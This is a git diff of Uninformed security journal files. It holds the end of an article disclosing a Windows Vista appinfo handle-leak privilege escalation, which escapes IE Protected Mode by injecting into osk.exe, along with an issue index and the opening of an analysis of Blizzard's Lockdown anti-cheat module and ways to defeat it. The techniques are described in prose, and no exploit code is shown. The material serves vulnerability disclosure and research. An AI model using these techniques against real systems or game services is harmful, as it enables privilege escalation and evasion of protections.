under Protected Mode. Because the RPC interface only allows IExplore.exe
|
||||
to use the RPC interface to request that a file to be saved, a program cannot
|
||||
directly abuse the RPC interface to write to arbitrary locations, at least not
|
||||
without user interaction.
|
||||
|
||||
Part of the reason why the RPC interface cannot be trivially abused is that
|
||||
there also exists some protection baked into the window manager that prevents
|
||||
a thread at a lower integrity level from sending certain, potentially
|
||||
dangerous, messages to threads at a higher integrity level. This allows
|
||||
ieuser.exe to safely display user interface on the same desktop as the
|
||||
IExplore.exe process without malicious code in the Internet Explorer process
|
||||
simply being able to simulate fake keystrokes in order to cause it to save a
|
||||
dangerous file to a dangerous location without user interaction.
|
||||
|
||||
Most programs that are integrity-level aware operate with the same sort of
|
||||
paradigm that Internet Explorer does. In such programs, there is typically a
|
||||
higher integrity broker process that provides a tightly controlled interface
|
||||
to request that certain actions be taken, with the consent of the user. For
|
||||
example, UAC has a broker process (a privileged service) that is responsible
|
||||
for displaying the consent user interface when the user tries to perform an
|
||||
administrative task. This operates similar in principal to how Internet
|
||||
Explorer can provide a security barrier through Protected Mode because the
|
||||
lower privileged process (the user program) cannot magically elevate itself
|
||||
to full administrative rights in the UAC case (which runs a program at high
|
||||
integrity level, as opposed to the default medium integrity level).
|
||||
Instead, it could only ask the service to display the consent UI, which is
|
||||
protected from interference by the program requesting elevation due to the
|
||||
window manager restrictions on sending dangerous messages to a higher
|
||||
integrity level window.
|
||||
|
||||
2) Breaking the Broker
|
||||
|
||||
If one has been using Windows Vista for some time, none of the behavior that
|
||||
has just been described should come across as new. However, there are some
|
||||
cases that have not yet been discussed which one might have observed from time
|
||||
to time with Windows Vista. For example, although programs are typically
|
||||
restricted from being able to synthesize input across integrity levels, there
|
||||
are some limited circumstances where this is permitted. One easy to see
|
||||
instance of this is the on-screen keyboard program (osk.exe) which, despite
|
||||
running without a UAC prompt, can generate keyboard input messages that are
|
||||
transmitted to other processes, even elevated administrative processes. This
|
||||
would at first appear to be a break in the security system; questions along
|
||||
the lines of "If one program can magically send keystrokes to higher integrity
|
||||
processes, why can't another?" come to mind. However, there are in fact some
|
||||
carefully-designed restrictions that are intended to prevent a user (or a
|
||||
program) from arbitrarily being able to execute custom code with this ability.
|
||||
|
||||
First of all, in order to request special access to send unrestricted keyboard
|
||||
input, a program's main executable must resolve to a path within the Program
|
||||
Files or Windows directory. Although the author feels that such a check is
|
||||
essentially a giant hack at best, it does effectively prevent a "plain user"
|
||||
running at medium integrity from being able to run custom code that can
|
||||
synthesize keystrokes to high integrity processes, as a plain user would not
|
||||
be able to write to any of these directories. Additionally, any such program
|
||||
must also be signed with a valid digital signature from any trusted code
|
||||
signing root. This is a fairly useless check from a security perspective, in
|
||||
the author's opinion, as anybody can pay a code signing authority to get a
|
||||
code signing certificate in their own name; code signing certificates are not
|
||||
a guarantee of malware-free (or even bug-free) code. Although it would be
|
||||
easy to bypass the second check with a payment to a certificate issuing
|
||||
authority, a plain user cannot so easily bypass the first check relating to
|
||||
the restriction on where the program main executable may be located.
|
||||
|
||||
Even if a user cannot launch custom code directly as a program with access to
|
||||
simulate keystrokes to higher integrity processes (known as "uiaccess"
|
||||
internally), one would tend to get the impression that it would be possible to
|
||||
simply inject code into a running osk.exe instance (or other process with
|
||||
uiaccess). This fails as well, however; the process that is responsible for
|
||||
launching osk.exe (the same broken service that is responsible for launching
|
||||
the UAC consent user interface, the "Application Information" (appinfo)
|
||||
service) creates osk.exe with a higher than normal integrity level in order to
|
||||
use the integrity level security mechanism to block users from being able to
|
||||
inject code into a process with access to simulate keystrokes.
|
||||
|
||||
When the appinfo service receives a request to launch a program that may
|
||||
require elevation, which occurs when ShellExecute is called to start a
|
||||
program, it will inspect the user's token and the application's manifest to
|
||||
determine what to do. The application manifest can specify that a program
|
||||
runs with the user's integrity level, that it needs to be elevated (in which
|
||||
case a consent user interface is launched), that it should be elevated if and
|
||||
only if the current user is a non-elevated administrator (otherwise the
|
||||
program is to be launched without elevation), or that the program requests the
|
||||
ability to perform keystroke simulation to high integrity processes.
|
||||
|
||||
In the case of a launch request for a program requesting uiaccess,
|
||||
appinfo!RAiLaunchAdminProcess is called to service the request. The process
|
||||
is then verified to be within the (hardcoded) set of allowed directories by
|
||||
appinfo!AiCheckSecureApplicationDirectory. After validating that the program
|
||||
is being launched from within an allowed directory, control is eventually
|
||||
passed to appinfo!AiLaunchProcess which performs the remaining work necessary
|
||||
to service the launch request. At this point, due to the "secure" application
|
||||
directory requirement, it is not possible for a limited user (or a user
|
||||
running with low integrity, for that matter) to place a custom executable in
|
||||
any of the "secure" application directories.
|
||||
|
||||
Now, the appinfo service is capable of servicing requests from processes of
|
||||
all integrity levels. Due to this fact, it needs to be capable of determining
|
||||
the correct integrity level to create a new process from at this point.
|
||||
Because the new process is not being launched as a full administrator in the
|
||||
case of a process requesting uiaccess, no consent user interface is displayed
|
||||
for elevation. However, the appinfo service does still need a way to protect
|
||||
the new process from any other processes running as that user (as access to
|
||||
synthesize keystrokes is considered sensitive). For this task, the
|
||||
appinfo!LUASetUIAToken function is called by appinfo to protect the new
|
||||
process from other plain user processes running as the calling user. This
|
||||
is accomplished by adjusting the token that will be used to create the new
|
||||
process to run at a higher integrity level than the caller, unless the
|
||||
caller is already at high integrity level (0x3000). The way LUASetUIAToken
|
||||
does this is to first try to query the linked token associated with the
|
||||
caller's token. A linked token is a second, shadow token that is assigned
|
||||
when a computer administrator logs in with UAC enabled; in the UAC case,
|
||||
the user normally runs as a restricted version of themselves, without their
|
||||
administrative privileges (or Administrators group membership), and at
|
||||
medium integrity level.
|
||||
|
||||
If the calling user does indeed have a linked token, LUASetUIAToken retrieves
|
||||
the integrity level of the linked token for use with the new process.
|
||||
However, if the user doesn't have a linked token (i.e. they are logged on as a
|
||||
true plain user and not an administrator running without administrative
|
||||
privileges), then LUASetUIAToken uses the integrity level of the caller's
|
||||
token instead of the token linked with the caller's token (in other words, the
|
||||
elevation token). In the case of a computer administrator this approach would
|
||||
normally provide sufficient protection, however, for a limited user, there
|
||||
exists a small snag. Specifically, the integrity level that LUASetUIAToken
|
||||
has retrieved matches the integrity level of the caller, so the caller would
|
||||
still have free reign over the process.
|
||||
|
||||
To counteract this issue, there is an additional check baked into
|
||||
LUASetUIAToken to determine if the integrity level that was selected is at (or
|
||||
above) high integrity. If the integrity level is lower than high integrity,
|
||||
LUASetUIAToken adds 16 to the integrity level (although integrity levels are
|
||||
commonly thought of as just having four values, that is, low, medium, high,
|
||||
and system, there are 0x1000 unnamed integrity levels in between each named
|
||||
integrity level). So long as the numeric value of the integrity level chosen
|
||||
is greater than the caller's integrity level, the new process will be
|
||||
protected from the caller. In the case of the caller already being a full,
|
||||
elevated administrator, there's nothing to protect against, so LUASetUIAccess
|
||||
doesn't attempt to raise the integrity level above high integrity.
|
||||
|
||||
After determining a final integrity level, LUASetUIAToken changes the
|
||||
integrity level in the token that will be used to launch the new process to
|
||||
match the desired integrity level. At this point, appinfo is ready to create
|
||||
the process. If needed, the user profile block is loaded and an environment
|
||||
block is created, following which advapi32!CreateProcessAsUser is called to
|
||||
launch the uiaccess-enabled application for the caller with a raised integrity
|
||||
level. After the process is created, the output parameters of
|
||||
CreateProcessAsUser are marshalled back into the caller's process, and
|
||||
AiLaunchProcess signals successful completion to the caller.
|
||||
|
||||
If one has been following along so far, the question of ``How does all of this
|
||||
relate to Internet Explorer Protected Mode'' has probably crossed one's mind.
|
||||
It turns out that there's a slight deficiency in the protocol outlined above
|
||||
with respect to creating uiaccess processes. The problem lies in the fact
|
||||
that AiLaunchProcess returns the output parameters of CreateProcessAsUser back
|
||||
to the caller's process. This is dangerous, because in the Windows security
|
||||
model, security checks are done when one attempts to open a handle; after a
|
||||
handle is opened, the access rights requested are forever more associated with
|
||||
that handle, regardless of who uses the handle. In the case of appinfo, this
|
||||
turns out to be a real problem because appinfo, being the creator of the new
|
||||
process, is handed back a thread and process handle that grant full access to
|
||||
the new thread and process, respectively. Appinfo then marshals these handles
|
||||
back to the caller (which may be running at low integrity level). At this
|
||||
point, a privilege escalation problem has occured; the caller has been
|
||||
essentially handed the keys to a higher integrity process. While the caller
|
||||
would never normally be able to open a handle to the new process on its own,
|
||||
in this case, it doesn't have to, as the appinfo service does so on its behalf
|
||||
and returns the handles back to it.
|
||||
|
||||
Now, in the ShellExecute case, the client stub for the appinfo
|
||||
AiLaunchAdminProcess routine doesn't want (or need) the process or thread
|
||||
handles, and closes them immediately after. However, this is obviously not a
|
||||
security barrier, as this code is running in the untrusted process and could
|
||||
be patched out. As such, there exists a privilege escalation hole of sorts
|
||||
with the appinfo service. It can be abused to, without user interaction, leak
|
||||
a handle to a higher integrity process to a low integrity process (such as
|
||||
Internet Explorer when operating in Protected Mode). Furthermore, even
|
||||
Internet Explorer in Protected Mode, running at low integrity, can request to
|
||||
launch an already-existing uiaccess-flagged executable, such as osk.exe (which
|
||||
is conveniently already in a "secure" application directory, the Windows
|
||||
system directory). With a process and thread handle as returned by appinfo,
|
||||
it is possible to inject code into the new process, and from there, as they
|
||||
say, the rest is history.
|
||||
|
||||
3) Caveats
|
||||
|
||||
Although the problem outlined in this article is indeed a privilege escalation
|
||||
hole, there are some limitations to it. First of all, if the caller is
|
||||
running as a plain user instead of a non-elevated administrator, appinfo
|
||||
creates the uiaccess process with integrity level 0x1010 (low integrity + 16).
|
||||
This is still less than medium integrity (0x2000), and thus in the true
|
||||
limited user case, the new process, while protected from other low integrity
|
||||
processes, is still unable to interfere with medium integrity processes
|
||||
directly.
|
||||
|
||||
In the case where a user is running as an administrator but is not elevated
|
||||
(which happens to be the default case for most Windows Vista users), it is
|
||||
true that appinfo.exe returns a handle to a process running at high integrity
|
||||
level. However, only the integrity level is changed; the process is most
|
||||
certainly not an administrator (and in fact has BUILTIN\Administrators as a
|
||||
deny only SID). This does mean that the new process is quite capable of
|
||||
injecting code into any processes the user has started though (with zero user
|
||||
interaction). If the user happens to already have a high integrity process
|
||||
running on the desktop as a full administrator, the new process could be used
|
||||
to attack it as the process would be running at the same integrity level and
|
||||
it would additionally be running as the same user. This means that in the
|
||||
default configuration, this issue can be used to escape from Protected Mode,
|
||||
but one is still not given full-blown administrative access to the system.
|
||||
However, any location in the user profile directory could be written to. This
|
||||
effectively eliminates the security benefit of Protected Mode for a
|
||||
non-elevated administrator (with respect to treating the user as a plain
|
||||
user).
|
||||
|
||||
Source code to a simple program to demonstrate the appinfo service issue is
|
||||
included with the article. The problem is at this point expected to be fixed
|
||||
by Windows Vista Service Pack 1 and Windows Server 2008 RTM. The sample code
|
||||
launches osk.exe with ShellExecute, patches out the CloseHandle calls in
|
||||
ShellExecute to retain the process and thread handles, and then injects a
|
||||
thread into osk.exe that launches cmd.exe. The sample program also includes a
|
||||
facility to create a low integrity process to verify correct function; the
|
||||
intended use is to launch a low integrity command shell, verify that
|
||||
directories such as the user profile directory cannot be written to, and then
|
||||
use the sample program from the low integrity process to launch a medium
|
||||
integrity cmd.exe instance without user interaction, which does indeed have
|
||||
free reign of the user profile directory. The same code will operate in the
|
||||
context of Internet Explorer in Protected Mode, although in the interest of
|
||||
keeping the example clear and concise, the author has not included code to
|
||||
inject the sample program in some form into Internet Explorer (which would
|
||||
simulate an attack on the browser).
|
||||
|
||||
Note that while the uiaccess process is launched as a high integrity process,
|
||||
it is configured such that unless a token is explicitly provided that requests
|
||||
high integrity, new child processes of the uiaccess process will launch as
|
||||
medium integrity processes. It is possible to work around this issue and
|
||||
retain high integrity with the use of CreateProcessAsUser by code injected
|
||||
into the uiaccess process if desired. However, as described above, simply
|
||||
retaining high integrity does not provide administrative access on its own.
|
||||
If there are no other high integrity processes running as the current user on
|
||||
the current desktop, running as high integrity and running as medium integrity
|
||||
with the non-elevated token are functionally equivalent, for all intents and
|
||||
purposes.
|
||||
|
||||
4) Conclusion
|
||||
|
||||
UAC, Internet Explorer Protected Mode, and the integrity level model represent
|
||||
an entirely new way of thinking about security in the Windows world.
|
||||
Traditionally, Windows security has been a user-based model, where all
|
||||
processes that execute as a user were considered equally trusted. Windows
|
||||
Vista and Windows Server 2008 are the first steps towards changing this model
|
||||
to support the concept of a untrusted process (as opposed to an untrusted
|
||||
user). While this has the potential to significantly benefit end user
|
||||
security, as is the case with Internet Explorer Protected Mode, there are
|
||||
bound to be bumps along the way. Writing an integrity level broker process is
|
||||
difficult. It is very easy to make simple mistakes that compromise the
|
||||
security of the integrity level mechanism, as the appinfo issue highlights.
|
||||
The author would like to think that by shedding light on this type of
|
||||
programming error, future issues of a similar vein may be prevented before
|
||||
they reach end users.
|
1383
uninformed/8.4.txt
Normal file
1383
uninformed/8.4.txt
Normal file
File diff suppressed because it is too large
Load diff
1822
uninformed/8.5.txt
Normal file
1822
uninformed/8.5.txt
Normal file
File diff suppressed because it is too large
Load diff
1234
uninformed/8.6.txt
Normal file
1234
uninformed/8.6.txt
Normal file
File diff suppressed because it is too large
Load diff
22
uninformed/8.txt
Normal file
22
uninformed/8.txt
Normal file
|
@ -0,0 +1,22 @@
|
|||
Engineering in Reverse
|
||||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
Skywing
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version check and client software authentication system used to verify the authenticity of clients connecting to Battle.net using the binary game client protocol. This system had been in use since just after the release of the original Diablo game and the public launch of Battle.net. The new authentication module (Lockdown) introduced a variety of mechanisms designed to raise the bar with respect to spoofing a game client when logging on to Battle.net. In addition, the new authentication module also introduced run-time integrity checks of client binaries in memory. This is meant to provide simple detection of many client modifications (often labeled "hacks") that patch game code in-memory in order to modify game behavior. The Lockdown authentication module also introduced some anti-debugging techniques that are designed to make it more difficult to reverse engineer the module. In addition, several checks that are designed to make it difficult to simply load and run the Blizzard Lockdown module from the context of an unauthorized, non-Blizzard-game process. After all, if an attacker can simply load and run the Lockdown module in his or her own process, it becomes trivially easy to spoof the game client logon process, or to allow a modified game client to log on to Battle.net successfully. However, like any protection mechanism, the new Lockdown module is not without its flaws, some of which are discussed in detail in this paper.
|
||||
html | pdf | txt
|
||||
|
||||
Exploitation Technology
|
||||
ActiveX - Active Exploitation
|
||||
warlord
|
||||
This paper provides a general introduction to the topic of understanding security vulnerabilities that affect ActiveX controls. A brief description of how ActiveX controls are exposed to Internet Explorer is given along with an analysis of three example ActiveX vulnerabilities that have been previously disclosed.
|
||||
html | pdf | txt
|
||||
|
||||
Context-keyed Payload Encoding
|
||||
I)ruid
|
||||
A common goal of payload encoders is to evade a third-party detection mechanism which is actively observing attack traffic somewhere along the route from an attacker to their target, filtering on commonly used payload instructions. The use of a payload encoder may be easily detected and blocked as well as opening up the opportunity for the payload to be decoded for further analysis. Even so-called keyed encoders utilize easily observable, recoverable, or guessable key values in their encoding algorithm, thus making decoding on-the-fly trivial once the encoding algorithm is identified. It is feasible that an active observer may make use of the inherent functionality of the decoder stub to decode the payload of a suspected exploit in order to inspect the contents of that payload and make a control decision about the network traffic. This paper presents a new method of keying an encoder which is based entirely on contextual information that is predictable or known about the target by the attacker and constructible or recoverable by the decoder stub when executed at the target. An active observer of the attack traffic however should be unable to decode the payload due to lack of the contextual keying information.
|
||||
html | pdf | txt
|
||||
|
||||
Improving Software Security Analysis using Exploitation Properties
|
||||
skape
|
||||
Reliable exploitation of software vulnerabilities has continued to become more difficult as formidable mitigations have been established and are now included by default with most modern operating systems. Future exploitation of software vulnerabilities will rely on either discovering ways to circumvent these mitigations or uncovering flaws that are not adequately protected. Since the majority of the mitigations that exist today lack universal bypass techniques, it has become more fruitful to take the latter approach. It is in this vein that this paper introduces the concept of exploitation properties and describes how they can be used to better understand the exploitability of a system irrespective of a particular vulnerability. Perceived exploitability is of utmost importance to both an attacker and to a defender given the presence of modern mitigations. The ANI vulnerability (MS07-017) is used to help illustrate these points by acting as a simple example of a vulnerability that may have been more easily identified as code that should have received additional scrutiny by taking exploitation properties into consideration.
|
||||
html | pdf | txt
|
||||
|
639
uninformed/9.1.txt
Normal file
639
uninformed/9.1.txt
Normal file
|
@ -0,0 +1,639 @@
|
|||
An Objective Analysis of the Lockdown Protection System for Battle.net
|
||||
12/2007
|
||||
Skywing
|
||||
skywing@valhallalegends.com
|
||||
|
||||
Abstract
|
||||
|
||||
Near the end of 2006, Blizzard deployed the first major update to the version
|
||||
check and client software authentication system used to verify the authenticity
|
||||
of clients connecting to Battle.net using the binary game client protocol. This
|
||||
system had been in use since just after the release of the original Diablo
|
||||
game and the public launch of Battle.net. The new authentication module
|
||||
(Lockdown) introduced a variety of mechanisms designed to raise the bar with
|
||||
respect to spoofing a game client when logging on to Battle.net. In addition,
|
||||
the new authentication module also introduced run-time integrity checks of
|
||||
client binaries in memory. This is meant to provide simple detection of many
|
||||
client modifications (often labeled "hacks") that patch game code in-memory in
|
||||
order to modify game behavior. The Lockdown authentication module also
|
||||
introduced some anti-debugging techniques that are designed to make it more
|
||||
difficult to reverse engineer the module. In addition, several checks that
|
||||
are designed to make it difficult to simply load and run the Blizzard
|
||||
Lockdown module from the context of an unauthorized, non-Blizzard-game
|
||||
process. After all, if an attacker can simply load and run the Lockdown
|
||||
module in his or her own process, it becomes trivially easy to spoof the game
|
||||
client logon process, or to allow a modified game client to log on to
|
||||
Battle.net successfully. However, like any protection mechanism, the new
|
||||
Lockdown module is not without its flaws, some of which are discussed in
|
||||
detail in this paper.
|
||||
|
||||
1) Introduction
|
||||
|
||||
The Lockdown module is a part of several schemes that attempt to make it
|
||||
difficult to connect to Battle.net with a client that is not a "genuine"
|
||||
Blizzard game. For the purposes of this paper, the author considers both
|
||||
modified/"hacked" Blizzard game clients, and third-party client software,
|
||||
known as "emubots", as examples of Battle.net clients that are not genuine
|
||||
Blizzard games. The Battle.net protocol also incorporates a number of schemes
|
||||
(such as a proprietary mechanism for presenting a valid CD-Key for inspection
|
||||
by Battle.net, and a non-standard derivative of the SRP password exchange
|
||||
protocol for account logon) that by virtue of being obscure and undocumented
|
||||
make it non-trivial for an outsider to successfully log a non-genuine client
|
||||
on to Battle.net.
|
||||
|
||||
Prior to the launch of the Lockdown module, a different system took its place and
|
||||
filled the role of validating client software versions. The previous system
|
||||
was resistant to replay attacks (caveat: a relatively small pool of challenge
|
||||
response values maintained by servers makes it possible to use replay attacks
|
||||
after observing a large number of successful logon attempts) by virtue of the
|
||||
use of a dynamically-supplied checksum formula that is sent to clients (a
|
||||
challenge, in effect). This formula was then interpreted by the predecessor
|
||||
to the Lockdown module, otherwise known as the "ver" or "ix86ver" module,
|
||||
and used to create a one-way hash of several key game client binaries. The
|
||||
result response would then be sent back to the game server for verification,
|
||||
with an invalid response resulting in the client being denied access to
|
||||
Battle.net.
|
||||
|
||||
While the "ver" module provides some inherent resistance to some
|
||||
types of non-genuine clients (such as those that modify Blizzard game binaries
|
||||
on disk), it does little to stop in-memory modifications to Blizzard game
|
||||
clients. Additionally, there is very little to stop an attacker from creating
|
||||
their own client software (an "emubot") that implements the "ver" module's
|
||||
checksum scheme, either by calling "ver" directly or through the use of a
|
||||
third-party, reverse-engineered implementation of the algorithm implemented in
|
||||
the "ver" module. It should be noted that there exists one basic protection
|
||||
against third party software calling the "ver" module directly; the "ver"
|
||||
series of modules are designed to always run part of the version check hash on
|
||||
the caller process image (as returned by the Win32 API GetModuleFileNameA).
|
||||
This poses a minor annoyance for third party programs. In order to bypass
|
||||
this protection, however, one need only hook GetModuleFileNameA and fake the
|
||||
result returned to the "ver" module.
|
||||
|
||||
Given the existing "ver" module's capabilities, the Lockdown module
|
||||
represents a major step forward in the vein of assuring that only genuine
|
||||
Blizzard client software can log on to Battle.net as a game client. The
|
||||
Lockdown module is a first in many respects for Blizzard with respect to
|
||||
releasing code that actively attempts to thwart analysis via a debugger
|
||||
(and actively attempts to resist being called in a foreign process with
|
||||
non-trivial mechanisms).
|
||||
|
||||
Despite the work put into the Lockdown module, however, it has proven perhaps
|
||||
less effective than originally hoped (though the author cannot state the
|
||||
definitive expectations for the Lockdown module, it can be assumed that a
|
||||
"hacking life" of more than several days was an objective of the Lockdown
|
||||
module). This paper discusses the various major protection systems embedded
|
||||
into the Lockdown module and associated authentication system, potential
|
||||
attacks against them, and technical counters to these attacks that Blizzard
|
||||
could take in a future release of a new version check/authentication module.
|
||||
|
||||
Part of the problem the developers of the Lockdown module faced relates to
|
||||
constraints on the environment in which the module operates. The author has
|
||||
derived the following constraints currently in place for the module:
|
||||
|
||||
1. The server portion of the authentication system is likely static and does not
|
||||
generate challenge/response values in real time. Instead, a pool of possible
|
||||
values appear to be pregenerated and configured on the server.
|
||||
2. The module needs to work on all operating systems supported by all Blizzard
|
||||
games, which spans the gamut from Windows 9x to Windows Vista x64. Note that
|
||||
there are provisions for different architectures, such as Mac OS, to use a
|
||||
different system than Windows architectures.
|
||||
3. The module needs to work on all versions of all Blizzard Battle.net games,
|
||||
including previous versions. This is due to the fact that the module plays
|
||||
an integral part in Battle.net's software version control system, and thus
|
||||
is used on old clients before they can be upgraded.
|
||||
4. Legitimate users should not see a high incidence of false positives, and it
|
||||
is not desirable for false positives to result in automated permanent action
|
||||
against legitimate users (such as account closure).
|
||||
|
||||
As an aside, in the author's opinion, the version check and authentication
|
||||
system is not intended as a copy protection system for Battle.net, as it does
|
||||
nothing to discourge additional copies of genuine Blizzard game software from
|
||||
being used on Battle.net. In essence, the version check and authentication
|
||||
system is a system that is designed to ensure that only copies of the
|
||||
genuine Blizzard game software can log on to Battle.net. Copy protection
|
||||
measures on Battle.net are provided through the CD-Key feature, wherein the
|
||||
server requires that a user has a valid (and unique) CD-Key (for applicable
|
||||
products).
|
||||
|
||||
2) Protection Schemes of the Lockdown Module
|
||||
|
||||
As a stark contrast to the old "ver" module, the Lockdown module includes a
|
||||
number of active defense mechanisms designed to significantly strengthen the
|
||||
module's resistance to attack (including either analysis or being tricked into
|
||||
providing a "good" response to a challenge to an untrusted process).
|
||||
|
||||
The protection schemes in the Lockdown module can be broken up into several
|
||||
categories:
|
||||
|
||||
1. Mechanisms to thwart analysis of the Lockdown module itself and the secret
|
||||
algorithm it implements (anti-debugging/anti-reverse-engineering).
|
||||
2. Mechanisms to thwart the successful use of Lockdown in a hostile process to
|
||||
generate a "good" response to a challenge from Battle.net (anti-emubot, and
|
||||
by extension anti-hack, where "anti-hack" denotes a counter to modifications
|
||||
of an otherwise genuine Blizzard game client).
|
||||
3. Mechanisms to thwart modifications to an otherwise-genuine Blizzard game
|
||||
client that is attempting to log on to Battle.net (anti-hack).
|
||||
|
||||
In addition, the Lockdown module is also responsible for implementing a
|
||||
reasonable facsimile of the original function of the "ver" module; that is, to
|
||||
provide a way to authoritatively validate the version of a genuine Blizzard
|
||||
game client, for means of software version control (e.g. the deployment of
|
||||
the correct software updates/patches to old versions of genuine Blizzard game
|
||||
clients connecting to Battle.net).
|
||||
|
||||
In this vein, the following protection schemes are present in the Lockdown
|
||||
module and associated authentication system:
|
||||
|
||||
2.1) Clearing the Processor Debug Registers
|
||||
|
||||
The x86 family of processors includes a set of special registers that are
|
||||
designed to assist in the debugging of programs. These registers allow a user
|
||||
to cause the processor to stop when a particular memory location is accessed,
|
||||
as an instruction fetch, as a data read, or as a data write. This debugging
|
||||
facility allows a user (debugger) to set up to four different virtual addresses
|
||||
that will trap execution when referenced in a particular way. The use of these
|
||||
debug registers to set traps on specific locations is sometimes known as
|
||||
setting a hardware breakpoint", as the processor's dedicated debugging
|
||||
support (in-hardware) is being utilized.
|
||||
|
||||
Due to their obvious utility to anyone attempting to analyze or reverse
|
||||
engineer the Lockdown module, the module actively attempts to disable this
|
||||
debugging aid by explicitly zeroing the contents of the key debug registers in
|
||||
the context of the thread executing the Lockdown module's version check
|
||||
call, CheckRevision. All the requisite debug registers are cleared immediately
|
||||
after the call to the CheckRevision routine in the Lockdown module is made.
|
||||
|
||||
This protection mechanism constitutes an anti-debugging scheme.
|
||||
|
||||
2.2) Memory Checksum Performed on the Lockdown Module
|
||||
|
||||
The Lockdown module, contrary to the behavior of its predecessor, implements
|
||||
a checksum of several key game executable files in-memory instead of on-disk.
|
||||
In addition to the checksum over certain game executables, the Lockdown
|
||||
module includes itself in the list of modules to be checksumed. This provides
|
||||
several immediate benefits:
|
||||
|
||||
1. Attempts to set conventional software breakpoints on routines inside the
|
||||
Lockdown module will distort the result of the operation, frustrating
|
||||
reverse engineering attempts. This is due to the fact that so-called
|
||||
software breakpoints are implemented by patching the instruction at the
|
||||
target location with a special instruction (typically `int 3') that causes
|
||||
the processor to break into the debugger. The alteration to the module's
|
||||
executable code in memory causes the checksum to be distorted, as the `int 3'
|
||||
opcode is checksumed instead of the original opcode.
|
||||
2. Attempts to bypass other protection mechanisms in the Lockdown module are
|
||||
made more difficult, as an untrusted process that is attempting to cause the
|
||||
Lockdown module to produce correct results via patching out certain other
|
||||
protection mechanisms will, simply by virtue of altering Lockdown code
|
||||
in-memory, inadvertently alter the end result of the checksum operation. The
|
||||
success of this aspect of the memory checksum protection is related to the
|
||||
fact that the Lockdown module attempts to disable hardware breakpoints as
|
||||
well. These two protection mechanisms thus complement eachother in a strong
|
||||
fashion, such that a naive attempt to compromise one of the protection
|
||||
schemes would usually be detected by the other scheme. In effect, the result
|
||||
is a rudimentary "defense in depth" approach to software protection schemes
|
||||
that is the hallmark of most relatively successful protection schemes.
|
||||
3. The inclusion of the version check module itself in the result of the output
|
||||
of the checksum is entirely new to the version check and client
|
||||
authentication system, and as such poses an additional, unexpected "speed
|
||||
bump" to persons attempting to reimplement the Lockdown algorithm in their
|
||||
own code.
|
||||
|
||||
This protection mechanism has characteristics of both an anti-debugging,
|
||||
anti-hack, and anti-emubot system.
|
||||
|
||||
2.3) Hardcoding of Module Base Addresses
|
||||
|
||||
As mentioned previously, the Lockdown module now implements a checksum over
|
||||
game executables in-memory instead of on-disk. Taking advantage of this
|
||||
change, the Lockdown module can hardcode the base address of the main process
|
||||
executable at the default address of 0x00400000. This is safe because no
|
||||
Blizzard game executable includes base relocation information, and as a result
|
||||
will never change from this base address.
|
||||
|
||||
By virtue of hardcoding this address, it becomes more difficult for an
|
||||
untrusted process to successfully call the Lockdown module. Unless the
|
||||
programmer is particularly clever, he or she may not notice that the Lockdown
|
||||
module is not actually performing a checksum over the main executable for the
|
||||
desired Blizzard game, but instead the main executable of the untrusted process
|
||||
(the default address for executables in the Microsoft linker program is the
|
||||
same 0x00400000 value used in Blizzard's main executables comprising their
|
||||
game clients).
|
||||
|
||||
While it is possible to change the base address of a program at link-time,
|
||||
which could be done by a third-party process in an attempt to make it possible
|
||||
to map the desired Blizzard main executable at the 0x00400000 address, it is
|
||||
difficult to pull this off under Windows NT. This is because the 0x00400000
|
||||
address is low in the address space, and the default behavior of the kernel's
|
||||
memory manager is to find new addresses for memory allocations starting from
|
||||
the bottom of the address space. This means that in virtually all cases, a
|
||||
virgin Win32 process will already have an allocation (usually one of the shared
|
||||
sections used for communication with CSRSS in the author's experience) that is
|
||||
overlapping the address range required by the Lockdown module for the main
|
||||
executable of the Blizzard game for which a challenge response is being
|
||||
computed. While it is possible to change this behavior in the Windows NT
|
||||
memory manager and cause allocations to start at the top of the address space
|
||||
and search downwards, this is not the default configuration and is also a
|
||||
relatively not-well-known kernel option. The fact that all users would need to
|
||||
be reconfigured to change the default allocation search preference for an
|
||||
untrusted process to typically successfully map the desired Blizzard game
|
||||
executable makes this approach relatively painful for a would-be attacker.
|
||||
|
||||
The Lockdown module also ensures that the return value of the
|
||||
GetModuleHandleA(0) Win32 API corresponds to 0x00400000, indicating that the
|
||||
main process image is based at 0x00400000 as far as the loader is concerned.
|
||||
The restriction on the base address of the game main executable module has the
|
||||
unfortunate side effect that it will not be possible to take advantage of
|
||||
Windows Vista's ASLR attack surface reduction capabilities, negatively
|
||||
impacting the resistance of Blizzard games to certain classes of exploitation
|
||||
that might impact the security of users.
|
||||
|
||||
This protection mechanism is primarily considered to be an anti-emubot scheme,
|
||||
as it is designed to guard against an untrusted process from succcessfully
|
||||
calling the Lockdown module.
|
||||
|
||||
2.4) Video Memory Checksum
|
||||
|
||||
Another previously nonexistant component to the version check algorithm that is
|
||||
introduced by the Lockdown module is a checksum over the video memory of the
|
||||
process calling the Lockdown module. At the point in time where the module
|
||||
is invoked by the Blizzard game, the portion of video memory checksummed should
|
||||
correspond to part of the "Battle.net" banner in the log on screen for the
|
||||
Blizzard game. The Lockdown module is currently only implemented for
|
||||
so-called "legacy" game clients, otherwise known as clients that use Battle.snp
|
||||
and the Storm Network Provider system for multiplayer access. This includes
|
||||
all Battle.net-capable Blizzard games ranging from Diablo I to Starcraft and
|
||||
Warcraft II: BNE. Future games, such as Diablo II, are not supported by the
|
||||
Lockdown module.
|
||||
|
||||
This represents an additional non-trivial challenge to a would-be attacker.
|
||||
Although the contents of the video memory to be checksummed is static, the way
|
||||
that the Lockdown module retrieves the video memory pointers is through an
|
||||
obfuscated call to several internal Storm routines (SDrawSelectGdiSurface,
|
||||
SDrawLockSurface, and SDrawUnlockSurface) that rely on a non-trivial amount of
|
||||
internal state initialized by the Blizzard game during startup. This makes the
|
||||
use of the internal Storm routines unlikely to simply work "out of the box" in
|
||||
an untrusted process that has not gone to all the trouble to initialize the
|
||||
Storm graphics subsystem and draw the appropriate data on the Storm video
|
||||
surfaces.
|
||||
|
||||
This protection mechanism is primarily considered to be an anti-emubot scheme,
|
||||
as it is designed to guard against an untrusted process from succcessfully
|
||||
calling the Lockdown module.
|
||||
|
||||
2.5) Multiple Flavors of the Lockdown Module
|
||||
|
||||
The original "ver" module scheme pioneered a system wherein there were multiple
|
||||
downloadable flavors of the version check module to be used by a client. The
|
||||
Battle.net server sends the client a tuple of (version check module filename,
|
||||
checksum formula and initialization parameters, version check module timestamp)
|
||||
that is used in order to version (and download, if necessary) the latest copy
|
||||
of the version check module. This mechanism provides for the possibility that
|
||||
